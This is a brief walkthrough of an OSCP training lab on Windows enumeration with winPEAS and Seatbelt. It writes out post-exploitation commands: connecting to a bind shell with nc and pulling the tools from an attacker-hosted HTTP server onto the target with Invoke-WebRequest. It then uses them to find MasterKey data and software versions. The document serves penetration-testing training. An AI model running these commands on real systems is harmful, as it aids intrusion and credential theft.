This is a walk through of what I did to resolve a capstone lab in OSCP, which focuses on automated enumeration using winPEAS and Seatbelt.
Required Applications
The steps listed are under the presumption that required applications are already installed and are working properly. Required applications:
- winPEAS.exe
- Seatbelt.exe
- python3 (installed in Kali VM)
- Windows VM (provided by OffSec Lab)
Steps
This exercise assumes there is already an existing bind shell. To connect to the target using nc:
nc <TARGET_IP_ADDRESS> <PORT_OF_BIND_SHELL>
powershell
Assuming winPEAS and Seatbelt are already in your Kali VM, setup a simple Python HTTP Server from the directory where the tools are located:
python3 -m http.server 80
On the bind shell session, run PowerShell then download the tools from the HTTP Server setup in the Kali VM using Invoke-WebRequest (iwr):
iwr -uri http://192.168.45.208/winPEASx64.exe -Outfile winPEAS.exe
iwr -uri http://192.168.45.208/Seatbelt.exe-Outfile Seatbelt.exe
To run WinPeas:
.\winPEAS.exe


To run Seatbelt:
.\Seatbelt.exe -group=all

Captured Flag / Proof of Concept
Q1: To get the MasterKey flags, the result of winPEAS.exe is saved to a text file. Findstr.exe was used to filter the result when displaying the contents of the output file.

Q2: Using Seatbelt.exe, the Windows host is enumerated. The flag for this item which is the DisplayVersion of XAMPP.
